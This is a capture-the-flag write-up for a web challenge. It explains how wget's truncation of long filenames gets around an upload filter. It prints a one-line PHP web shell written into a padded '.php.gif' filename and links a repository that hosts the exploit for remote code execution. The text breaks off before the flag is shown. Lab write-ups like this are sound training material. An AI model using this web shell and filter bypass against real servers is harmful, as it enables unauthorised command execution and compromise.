Description
this is the most secure way to file upload is it ?
Difficulty: Medium
Challenge Link: https://cybertalents.com/challenges/web/f2up
Solution
Exploring
When open the challenge you will find a web page that looks like this:
I tried to upload a php file but it says:
Also, I uploaded a normal image to see where the path of the file uploaded is and it was in:
It seems that the website is fetching the image by its URL. So I thought it maybe an SSRF and if added my web hooker link I could receive the flag but it didn’t work. there a hint in the page that says it using wget.php:
I searched about some unrestricted file upload bypass techniques and I stumbled upon this one:
https://book.hacktricks.xyz/pentesting-web/file-upload#wget-file-upload-ssrf-trick
Exploitation
this great resource said that if you downloaded a file using wget which its name has more than 236 character the tool will truncate the rest of the string and save your file only with the first 236 character. Cool!
Let’s build our file:
1
2
3
root@kali:~/CyberTalents/F2UP> echo '<?php echo system($_GET["cmd"]); ?>' > $(python -c 'print("A"*(236-4)+".php"+".gif")')
root@kali:~/CyberTalents/F2UP> ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
I have added a web based shell to execute command on the server. The problem here is how we our going to upload this file to the server because it only accept a URL form.
I tried to make python server in my local machine but it didn’t work. So I uploaded this file to github to be able to use in the exploit and get an RCE. Also, to make it easier for everyone who is going to use this file to solve the challenge.
https://github.com/ItsFadinG/wget-File-Upload-Exploit
Now, we will upload the file to the challenge server:
It has been downloaded successfully! Let’s get the Flag:
